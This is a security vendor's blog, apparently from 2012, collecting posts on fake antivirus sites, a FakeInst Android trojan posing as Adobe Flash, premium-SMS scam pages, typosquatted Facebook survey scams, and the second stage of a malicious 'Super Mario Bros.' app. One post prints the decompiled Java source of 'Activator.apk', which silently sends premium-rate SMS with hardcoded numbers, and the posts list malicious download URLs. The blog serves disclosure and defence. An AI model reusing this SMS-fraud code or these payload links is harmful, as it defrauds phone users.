AegisLab Security Blog - English

    Last week, AegisLab found a strange domain name: hxxp://adobe-upgrade.org/w.php?f=28f52. Does it look like an official Adobe domain name ?! Actually it's not! It's registered by attacker in order to trick victim to download malicious program. After analyzing the program in depth, we found it's a fake AV. Once installed completely, it will show you the virus scaning page (Figure 1) and show how many files are infected in this computer. It's all fake but you will really get infected after the "scaning" finished :-)

   VirusTotal details: 

Figure 1: Fake virus scan page

by AegisLab 

    AegisLab discovered a fake Adobe Flash Player app in 3rd party market in Russia. Actually, it's a variant of FakeInst (aka OpFake, SMSSend or TrojanSMS) which tricks victim to download and install it, then send SMS to premium-rate number. The VirusTotal detection rate is shown as below:

Figure 1: androidmir.com

Figure 2: myadroidmaklet.net

Figure 3: filedats.net

How do we find the above malicious websites? That's because one day while our WebGuard Team patrols on the Internet, the researcher finds a suspicious link to a Android APK called "Cool Reader". The link is not so simple and direct, it will redirect you to another page and jump to another site in order to evade the detection and tracking. Once you install the app completely, the fake app will issue an emergent update notification which tricks you to download another app. In the following figures, you will see the whole trick tips:

Figure 4: Cool Reader

Figure 5: fake installation process

Figure 6: fake disclaimer (can you see the notification on the upper-left corner?)

Figure 7: try to download another app

Figure 8: fake login page (just press Enter is ok)

Figure 9: lure you to link http://androidmir.com/download/cr3-0-45-07.apk (link is not existent)

Figure 10: the emergent update notification for Adobe Flash Player

Figure 11: connect to myadroidmaklet.net

While you are installing the fake Adobe Flash Player, you will see it require read/send SMS, read contact data and read GPS location permissions (Figure 12,13). Actually, normal Adobe Flash Player doesn't need such permissions.

Figure 12,13: fake Adobe Flash Player

Once the installation completed, you will find a shortcut on the desktop. After clicking, one "Browser" app will be downloaded and installed (Figure 14,15). The "Browser" app requires the same permissions as fake Adobe Flash Player (Figure 16,17). 

Figure 14,15: update browser ? (just a trick)

Figure 16,17: fake Browser

Yes, this kind of attack is old-fashioned and nothing special, but Android users are always being tricked. AegidsLab reminds you that only download apps from trusted Android Markets, never click suspicious links and install AegisLab Antivirus :-)

By AegisLab 

    AegisLab discovered a russian website called "google-file.com" which has a google style look(Figure 1). But actually it's not an official google service, it's a premium-rate SMS scam website. If you want to download some files(figure 2), you have to enter your phone number(figure 3) first and then the page will tell you to send texts to specific number in order to verify your identity(figure 4). Finally, you money will fly away(figure 5). 

Figure 1: Google-File.com

Figure 2: File to download

Figure 3: Input your phone number

Figure 4: Send premium-rate SMS to specific number

Figure 5: so many complaints to google-file.com

We also found "google-fiile.mk3k.ru", "google-fille.org", and "google-fiile.org" are redirecting to Google-File.com. AegisLab WebGuard has blocked these 4 websites! 

By AegisLab

    Last week, AegisLab published「Security Alert 2012-07-12: Malicious "Super Mario Bros." App in Google Play」, we mentioned that the 2nd stage infection is trying to download a apk - called "Activator.apk", the snippet code is listed as below marked as red color:

-----------------------------------------------------------------------
package com.activator;

import android.app.Activity;
import android.app.AlertDialog;
import android.app.AlertDialog.Builder;
import android.content.DialogInterface;
import android.content.DialogInterface.OnClickListener;
import android.os.Bundle;
import android.telephony.SmsManager;
import android.telephony.TelephonyManager;
import java.util.Random;
import java.util.regex.Pattern;

public class ActivatorActivity extends Activity
{
TelephonyManager TM;
AlertDialog.Builder builder;
String operator;

private void sendSMS(String paramString1, String paramString2)
{
SmsManager.getDefault().sendTextMessage(paramString1, null, paramString2, null, null);
}

protected void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
setContentView(2130903040);
this.TM = ((TelephonyManager)getSystemService("phone"));
this.operator = this.TM.getSimOperatorName();
if (Pattern.matches("[bBeEeE]*", this.operator.substring(0, 3)))
{
int k = 1 + new Random().nextInt(10000);
startProgress("1518", "DEF1773");
startProgress("3170", "4037" + k);
setResult(1);
finish();
}
while (true)
{
return;
if (Pattern.matches("[mMtTsS]*", this.operator.substring(0, 3)))
{
int j = 1 + new Random().nextInt(10000);
startProgress("770656", "DEF1773");
startProgress("3170", "4037" + j);
setResult(1);
finish();
continue;
}
if (this.operator.equalsIgnoreCase(""))
{
this.builder = new AlertDialog.Builder(this);
this.builder.setCancelable(false);
this.builder.setMessage("Ошибка при загрузке базы обоев. Попробуйте позже.");
this.builder.setNeutralButton("OK", new DialogInterface.OnClickListener()
{
public void onClick(DialogInterface paramDialogInterface, int paramInt)
{
ActivatorActivity.this.setResult(0);
ActivatorActivity.this.finish();
}
});
this.builder.create().show();
continue;
}
int i = 1 + new Random().nextInt(10000);
startProgress("3170", "4037" + i);
setResult(1);
finish();
}
}

public void startProgress(String paramString1, String paramString2)
{
new Thread(new Runnable(paramString1, paramString2)
{
public void run()
{
ActivatorActivity.this.sendSMS(this.val$number, this.val$message);
}
}).start();
}
}

-----------------------------------------------------------------------

Basically, it will send different message to different number based on different OperatorName:

operator = OperatorName()
Case1：
Pattern.matches("[bBeEeE]*", operator.substring(0, 3))
number=1518, message="DEF1773"
number=3170, message="4037" + 1~10000 (any number)

Case2：
Pattern.matches("[mMtTsS]*", operator.substring(0, 3))
number=770656, message="DEF1773"
number=3170, message="4037" + 1~10000(any number)

Case3(neither case 1 or case 2 and OperatorName is not empty)
number=3170, message="4037" + 1~10000(any number)

If operatorName is empty, a alert dialog will pop up - "Ошибка при загрузке базы обоев. Попробуйте позже." (translated by google - "Failed to load base wallpaper. Please try again later")

Because "Super Mario Bros." is masqueraded as a wallpaper app, this message just tricks you.

By AegisLab

    According to Symantec and F-Secure blogs, malicious "Super Mario Bros." app appears in Google Play for several days. It looks like a action game, but after installation completed, you will see icon display "Mario HD Wallpaper" as in Figure 2. Google Play has removed this app and some related apps with the same developer, but you can find the apps in 3rd-party market as in Figure 1. This app uses 2-stage or multi-stage infection technique in order to evade Google Play review. Simply speaking, the first stage app is usually harmless, but the second stage will download some malicious contents or another malicious apk to install.

In this app(Super Mario Bros.), we found 3 links to drop box are malicious, they all point to (http://dl.dropbox.com/u/87265868/Activator.apk) !

• http://dl.dropbox.com/u/87945969/srv.txt
• http://dl.dropbox.com/u/88508558/srv.txt
• http://dl.dropbox.com/u/87265868/srv.txt (non-existent)

Obviously, you can see the second stage is to download "Activator.apk" and install. After installation completed, "Activator" will be launched and send premium-rate SMS (target Eastern-Euorpean area) and finally un-install itself.

Figure 1: We discovered it on 3rd-party market.

Figure 2: "Mario HD Wallpaper"

Figure 3: Russian disclaimer

Figure 4: Russian disclaimer

Figure 5: AegisLab Antivirus detected

VirusTotal detection rate:

• https://www.virustotal.com/file/e63421fdf671b38d3b7e6f2bed02707311aa0312bd76638ebf70198cee3d382c/analysis/ (4/42)
• https://www.virustotal.com/file/d247fd61d064e3d2fb4dd060b52b2ca039eecdb295d4ecba4055e7c679a71eba/analysis/ (2/41)

According to the developer information, AegisLab discovered 5 related apps with the same developer and AegisLab Antivirus can detect them all.

By AegisLab 

    Remember the security alert we published before:「Security Alert 2012-05-29: Facebook URL Hijacking」, AegisLab discovered the website style in facenook.com and facevook.com look more similar as FB official website as in Figure 1.

Figure 1: Look so similar as Facebook style

Once you get into the page, you will hear the recording voice as follows：
"You have been selected to take part in our anonymous survey! 
Complete this 30 second questionnaire, and to say "thank you", we'll offer you an exclusive gift."

Click the "Start" button and then fill-in the answer：

Figure 2: Answer the questions

After answering the all 5 questions,  Best Buy and Walmart Gift Card win-prize page will pop-up as in Figure 3. (Don't even think about it, you'll never win the prize!)

Figure 3: Choose the gift card

After choosing the gift card you want, you have to input the cell phone number and e-mail address as in Figure 4. (OMG! Don't do that!)

Figure 4: Fill-in cell phone number and e-mail address

Congratulation! You have finished the questionnaire but all in vain, except leaking your sensitive information. (and will get more spam :-) )

By AegsiLab